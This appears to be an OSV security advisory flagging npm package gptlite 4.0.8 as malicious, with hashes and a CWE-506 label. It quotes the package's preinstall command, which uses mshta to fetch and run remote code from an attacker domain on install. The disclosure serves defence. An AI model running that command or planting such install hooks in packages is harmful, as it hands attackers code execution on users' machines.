MAL-2026-10461

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/gptlite/MAL-2026-10461.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-10461
Published
2026-07-13T17:38:10Z
Modified
2026-07-13T18:16:55.003391661Z
Summary
Malicious code in gptlite (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (e1b12c4a304855689342c2732abcf11dec5cc206960f495525b967fca6d14662)

The package's npm preinstall lifecycle script (preinstall.js, referenced from package.json's "preinstall": "node preinstall.js") invokes child_process.exec with the command cmd /c "mshta http://fixars.top". On Windows, mshta.exe fetches the remote HTML Application over plain HTTP from fixars.top and executes it as trusted code. The fetch runs automatically on npm install, before any consumer code is reviewed, and delivers arbitrary attacker-controlled code execution on the installer's machine. The destination domain is unrelated to any documented package purpose and is served over unauthenticated HTTP, so the executed content is fully attacker-controlled and mutable.

Database specific
{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-07-13T17:38:10Z",
            "versions": [
                "4.0.8"
            ],
            "sha256": "e1b12c4a304855689342c2732abcf11dec5cc206960f495525b967fca6d14662",
            "id": "IN-MAL-2026-010274",
            "source": "amazon-inspector",
            "import_time": "2026-07-13T18:10:12.715663135Z"
        }
    ]
}
References
Credits

Affected packages

npm / gptlite

Package

Affected ranges

Affected versions

4.*
4.0.8

Database specific

indicators
{
    "evidence_files": [
        {
            "tlsh": "70b012d499453234b252a0e02c3060225807c441225055e0648c451d441741516235fd",
            "sha256": "6531737cdf18669d076b7ff3bf8168ddc74828f385a4a037a47bd8767d11b889",
            "path": "preinstall.js"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha1": "cdc53a1160bba6a26c8d25b1cd8b0b020b1a60e9",
                "sha512_sri": "sha512-oxwoImsxVy/06e+Ao96U0fR3VMhUAK+8qsCKPLAGTWDl3yWm4xZd2PGxlI4J0EhS2e2iEu63xwPABtdwefRugQ=="
            },
            "filename": "gptlite-4.0.8.tgz"
        }
    ]
}
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/gptlite/MAL-2026-10461.json"